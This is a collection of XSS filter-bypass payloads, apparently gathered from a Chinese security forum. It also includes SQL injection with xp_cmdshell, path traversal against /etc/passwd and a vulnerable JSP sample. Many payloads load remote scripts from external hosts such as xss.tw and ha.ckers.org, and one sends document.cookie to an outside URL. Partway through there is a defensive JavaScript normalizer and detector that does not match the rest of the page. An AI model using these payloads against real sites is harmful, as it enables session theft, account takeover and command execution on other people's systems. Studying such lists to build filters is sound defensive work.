Collection of XSS filter bypasses (updates complete)
<a href="javascrip:alert(document.cookie)"> pop-up via an a tag
"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"> Usable when the page filters <script and single quotes; what the document.write above outputs is <script>alert(1)</script>. To shorten it, merge the arguments into a single call, like this: String.fromCharCode(76,90,83,66);
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))> When <script> is filtered and JS cannot otherwise be invoked, similar code can get through; the code above redirects the URL to javascript:document.write("<script src=xxx></script>"), i.e. it loads the JS file xxx. To shorten it, merge the arguments into a single call, like this: String.fromCharCode(76,90,83,66);
"><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe> pop-up
<img src=x onerror=appendChild(createElement('script')).src='//js URL' /> img tag that loads the remote script
<img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='script URL'" /> workaround when the <script> tag and spaces are filtered
<img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
Echoed back as: <img src="5" onerror=eval("alert('xss')")></img>
To load a script instead, use: javascript:document.write(unescape(' <script src="script URL"></script>')); after editing it, hex-encode it and put it inside eval
Note: in the first snippet, the code to run is hex-encoded and then handed to eval from the img error event; eval evaluates and executes the contents of (), so once the code above is decoded it runs.
In the second (script-loading) snippet, JavaScript's unescape function first decodes the hex inside (), and document.write then writes the content inside () into the document object.
Because the content inside () has already been decoded by unescape, what is output is normal; without the decoding the output would be hex.
No dangerous tags such as script appear here, and no single quotes, so the filter is bypassed. (Filtered: single quotes and several dangerous tags.)
<script>document.write(String.fromCharCode(your code here));</script> bypass when the equals sign, single quotes, double quotes and spaces are filtered
<img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")> everything worth filtering has been filtered
<img src=x onerror=alert(/insight-labs/)>, <p with an event handler for the pop-up
If script is blocked, change script to sc%0aript to bypass it
"h"+"t"+"t"+"p", bypasses filtering of http
'"><script>alert(/1/)</script><a="
'"><script
src=http://x.co/xiHv></script><a="
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
'"><script
src="//x.co/xiHv"></script><a="
'"><script
src=//xss.tw/2045></script><a="
'"><script
src=//xss.tw/3058></script><a="
<script src=//xss.tw/3058></script>
"
quotes
spaces
< <
> >
no src, no equals sign
no quotes
"></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
eval(Dec('203041263543203','2549'));
<div
style="display:none"></div><div style="display:none" t="1"
e="style\/<'"></div>"/
\""/<img src=#
onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
<div
id="myxsxxcd" style="color:red;display:none"
title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}">
<DIV><A></A>
<STYLE><!--a{<
img
src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>}--></style></DIV>
<td
width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg">
<img
src=x
onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x
onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))>
<img src=x
onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)">
<img src=x
onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'>
<p><img
class="reference" contenteditable="false" data-refid="2" data-type="reference"
onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))"
src="http://img.baidu.com/img/baike/editor/reference.gif"
unselectable="on"
/></p>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
<div
class="qm_left" style="position:relative;z-index:2;background:url(//xss.tw/2180)
no-repeat 0
0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40px;height:40px;">
<span
class="qm_ico_print" id="mail_print" title="打印"
onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&');"></span>
ECMAScript v3 removed the unescape() function from the standard and discourages its use, so decodeURI() and decodeURIComponent() should be used instead. It decodes by finding character sequences of the form %xx and %uxxxx (x is a hexadecimal digit) and replacing them with the Unicode characters \u00xx and \uxxxx.
Decoding: unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');
Encoding: escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud');
javascript:document.write(unescape('<script src="http://www.xxxx.com/x.js"></script>'));
document.write(String.fromCharCode(60,12,62));
==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
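The encodings walked through above (String.fromCharCode lists, \xNN and octal escapes fed to eval, %xx/%uxxxx for unescape, and keyword splitting such as sc%0aript and java\0script) are exactly the layers a defender has to undo before a filter or log rule can match. The following is an added example, not code from the original page: a small normalizer that decodes those layers and then applies keyword rules that tolerate control characters inside a keyword. The rule names and helper functions are my own.

```javascript
"use strict";

// Merge "String.fromCharCode(60)+String.fromCharCode(115)" chains into one
// call (repeat until stable), then replace each call whose arguments are a
// plain numeric list with the characters it produces.
function decodeFromCharCode(s) {
  const chain = /(String\.fromCharCode\([\d\s,]*)\)\s*\+\s*String\.fromCharCode\(\s*/g;
  let prev;
  do { prev = s; s = s.replace(chain, "$1,"); } while (s !== prev);
  return s.replace(/String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g,
    (_, list) => String.fromCharCode(...list.split(",").map((n) => parseInt(n, 10))));
}

// JavaScript string escapes: \xNN, \uNNNN and legacy octal \NNN
// (the "\x58S\x53\40...\153e\162" entry above mixes all three).
function decodeJsEscapes(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})|\\([0-7]{1,3})/gi, (_, hx, un, oct) =>
    String.fromCharCode(hx !== undefined ? parseInt(hx, 16)
      : un !== undefined ? parseInt(un, 16) : parseInt(oct, 8)));
}

// URL escapes as unescape() reads them: %NN and the non-standard %uNNNN.
function decodeUrlEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, un, hx) => String.fromCharCode(parseInt(un !== undefined ? un : hx, 16)));
}

// Numeric HTML character references, with or without the trailing ';'.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#(\d+);?/gi,
    (_, hx, dec) => String.fromCharCode(hx !== undefined ? parseInt(hx, 16) : parseInt(dec, 10)));
}

// One canonical, lower-case view of the input for rule matching.
function normalize(s) {
  return decodeNumericEntities(decodeUrlEscapes(decodeJsEscapes(decodeFromCharCode(s)))).toLowerCase();
}

// Old browsers ignored NUL, tab, CR and LF inside these keywords
// (java\0script, sc%0aript, jav<newline>ascript above), so the rules accept
// control characters between letters rather than stripping them globally.
const loose = (word) => word.split("").join("[\\x00-\\x1f]*");
const INDICATORS = [
  ["script-tag", new RegExp("<\\s*" + loose("script") + "\\b")],
  ["script-url", new RegExp("(?:" + ["javascript", "vbscript", "livescript", "mocha"].map(loose).join("|") + ")\\s*:")],
  ["event-handler", /\bon(?:error|load|click|mouseover|mouseout)\s*=/],
  ["css-expression", /expression\s*\(/],
  ["eval-call", /\beval\s*\(/],
];

// Names of the rules that fire on the normalized input (empty = nothing seen).
function detect(raw) {
  const text = normalize(raw);
  return INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Constructed sample in the shape of the img/onerror entries above.
console.log(detect('<img src=x onerror=eval("\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29")>'));
```

The decoders are deliberately applied in a fixed order; a production rule engine would loop until the text stops changing, since payloads on this page nest one encoding inside another.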
"></span><script>document.write(http://baidu.com)</script><span>
[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114));
[/img][/url][/email]
Mouse click
<a href="http://www.xyydyt.com"
style="color:#143d70; simsun;"
onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com');
return(false);">asdasdsad</a>
<table
background="javascript:alert(/xss/)"></table> inserting a script via a table
When < and > are filtered, use \x3cscript src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e
<script defer="defer">
var a,b;
a="/";
b="/x.co/xiHv";
window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");
</script>
<%-- Vulnerable JSP: the request parameter is echoed unescaped into a script block --%>
<% String str_a = request.getParameter("a"); %>
var a = <%=str_a%>;
document.write(a);
<img
src="123">
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('xss')</script>
';exec%20master..xp_cmdshell%20'dir%20
c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.
domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG
src="javascript:alert('XSS');">
<IMG
src=javascript:alert('XSS')>
<IMG
src=JaVaScRiPt:alert('XSS')>
<IMG
src=JaVaScRiPt:alert("XSS")>
<IMG
src=javascript:alert('XSS')>
<IMG
src=javascript:alert('XSS')>
<IMG
src=javascript:alert('XSS')>
<sRCIpt>alert(/123/)</ScRpT>
<P><SPAN
class=xmsw title=防火外墙保温材料
onmouseout="window.location='http://www.xfydyt.com'">了解你的产品和行</SPAN></P>
<div
style="background-image:url(<script>alert(document.cookie)</script>)">
<div
style="background-image:url(javascript:alert(document.cookie))">
<div
style="behaviour:url('http://www.how-to-hack.org/exploit.html');">
<div
style="width:expression(alert('x123ss'));">
<img
src="java&#script:alert(/1231/);">
<img
src=javascript:alert(/1231/);>
<img
src="javascript:alert('XSS')">
<IMG
src="jav ascript:alert('XaSS');">
<IMG src="jav
ascript:alert('XbSS');">
<IMG src="jav
ascript:alert('XcSS');">
"<IMG src=java\0script:alert(\"XSS\")>";'
> out
<IMG src="
javascript:alert('XdSS');">
<SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
<BODY
BACKGROUND="javascript:alert('XeSS')">
<BODY
ONLOAD=alert('XgSS')>
<IMG
DYNSRC="javascript:alert('XhSS')">
<IMG
LOWSRC="javascript:alert('XiSS')">
<BGSOUND
src="javascript:alert('XjSS');">
<span
onclick="javascript:changeFont(2);">
<SPAN class=xmsw title=dd
onmouseout=window.location='http://www,xfydyt.com'>test</span>
<span
class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie>test</span>
<SPAN
class=xmsw title=dd
onmouseout=javascript:alert(document.cookie)>test</SPAN>
<br
size="&{alert('XkSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK
REL="stylesheet" href="javascript:alert('XlSS');">
<IMG
src='vbscript:msgbox("XmSS")'>
<IMG src="mocha:[code]">
<IMG
src="livescript:[code]">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XoSS');">
<IFR AME
src=javascript:alert('XSnS')></IFRA ME>
<FRAMESET><FRAME
src=javascript:alert('XpSS')></FRAME></FRAMESET>
<TABLE
BACKGROUND="javascript:alert('XSqS')">
<DIV STYLE="background-image:
url(javascript:alert('X1SS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV
STYLE="width:
expression(alert('X2SS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("X3SS")';</STYLE>
<IMG
STYLE='xss:expre\ssion(alert("X5SS"))'>
<STYLE
TYPE="text/javascript">alert('X4SS');</STYLE>
<STYLE
TYPE="text/css">.XSS{background-image:url("javascript:alert('X6SS')");}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('X7SS')")}</STYLE>
<BASE
href="javascript:alert('X8SS');//">
getURL("javascript:alert('X9SS')")
a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);
<XML
src="javascript:alert('X11SS');">
"> <BODY
ONLOAD="a();"><SCRIPT>function
a(){alert('X12SS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG
src="javascript:alert('X13SS')"
<!--#exec cmd="/bin/echo '<SCRIPT
SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
<IMG
src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT
a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT
"a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A
href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
<DIV
STYLE="width:expression(alert('anyunix'));">
<IMG
SRC='vbscript:msgbox("anyunix")'>
<STYLE>width:expression(alert('anyunix'));</STYLE>
(1) Plain XSS: JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(2) IMG tag XSS using a JavaScript command
<SCRIPT
SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(3) IMG tag, no semicolon, no quotes
<IMG
SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG
SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolon required)
<IMG
SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG
SRC=jav..(omitted)..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG
SRC=jav..(omitted)..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG
SRC=java..(omitted)..XSS')>
(11) Embedded tab, splitting the word javascript
<IMG
SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the word javascript
<IMG
SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav
ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav
ascript:alert('XSS');">
(15) Multi-line injected JavaScript, an extreme XSS example
<IMG
SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'
src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag
<IMG SRC="
javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY
onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT
SRC=http://3w.org/XSS/xss.js?<B>;
(25) No closing script tag 2
<SCRIPT
SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG
SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript filter
\";alert('XSS');//
(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY
BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG
LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND
SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK
REL="stylesheet"
HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK
REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li
{list-style-image:
url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG
SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META
HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42)Iframe
<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>
(43)Frame
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
(44)Table
<TABLE
BACKGROUND="javascript:alert('XSS')">
(45)TD
<TABLE><TD
BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image:
url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV
STYLE="background-image: url( javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width:
expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG
STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)
<XSS
STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE
HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED
SRC="http://3w.org/XSS/xss.swf"
></EMBED>
(56) Using ActionScript inside Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import
namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can embed the JS code in an image
<SCRIPT
SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect
302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT
a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT
=">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT
a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT
"a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT
a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT
a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL workaround
<A
HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A
HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A
HREF="http://3232235521">XSS</A>
(71) Hex IP
<A
HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A
HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A
HREF="h
tt p://6
6.000146.0×7.147/"">XSS</A>
(74) Dropping [http:]
<A
HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A
HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A
HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Code:
<INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
Code: <BODY
BACKGROUND="javascript:alert(XSS)">
Code: <BODY
ONLOAD=alert(XSS)>
Code: <IMG
DYNSRC="javascript:alert(XSS)">
Code: <BGSOUND
SRC="javascript:alert(XSS);">
Code: <BR SIZE="&{alert(XSS)}">
(Netscape)
Code: <LINK REL="stylesheet"
HREF="javascript:alert(XSS);">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code:
<STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
Code: <META
HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>;; REL=stylesheet">
Code:
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Code:
<XSS STYLE="behavior: url(xss.htc);">
Code: <STYLE>li
{list-style-image:
url("javascript:alert(XSS)");}</STYLE><UL><LI>XSS
Code:
<IMG SRC="mocha:[code]"> (netscape only)
Code: <IMG
SRC="livescript:[code]"> (netscape only)
Code: <TABLE
BACKGROUND="javascript:alert(XSS)">
Code: <IFRAME
SRC="javascript:alert(XSS);"></IFRAME>
Code: <TABLE><TD
BACKGROUND="javascript:alert(XSS)">
Code: <DIV STYLE="background-image:
url(javascript:alert(XSS))">
Code: <BASE
HREF="javascript:alert(XSS);//">
US-ASCII encoding (discovered by Kurt). Using 7-bit ASCII in place of 8-bit bypasses many filters, but the server must be exchanging data in US-ASCII; so far only Apache Tomcat has been found to do this.
Code:
?scriptualert(EXSSE)?/scriptu
META protocol
Code:<META
HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
Code:
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">
Unicode-encoding the DIV
Code:
<DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069
070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029
029">
Using the expression property
Code: <DIV STYLE="width:
expression(alert(XSS));">
STYLE tag
Code:<STYLE>@importjavasc
ipt:alert("XSS");</STYLE>
Code: <STYLE
TYPE="text/javascript">alert(XSS);</STYLE>
Code:
<STYLE>.XSS{background-image:url("javascript:alert(XSS)");}</STYLE><A
CLASS=XSS></A>
Code: <STYLE
type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>
OBJECT tag
Code:
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code:
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert(XSS)></OBJECT>
EMBED tag
Code:
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
Code: <EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
Use the following code in the Flash file:
Code:
a="get";
b="URL("";
c="javascript:";
d="alert(XSS);")";
eval(a+b+c+d);
An XML namespace can import an .htc behavior file, but it must be on the same server
Code: <HTML xmlns:xss>
<?import
namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Xss.htc:
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH
EVENT="ondocumentready" ONEVENT="main()"
LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
XML data island obfuscated with CDATA
Code: <XML
ID=I><X><C><![CDATA[<IMG
SRC="javas]]><![CDATA[cript:alert(XSS);">]]>
</C></X></xml><SPAN
DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
XML data island
Code:<XML
ID="xss"><I><B><IMG SRC="javas<!--
-->cript:alert(XSS)
Collected by 情空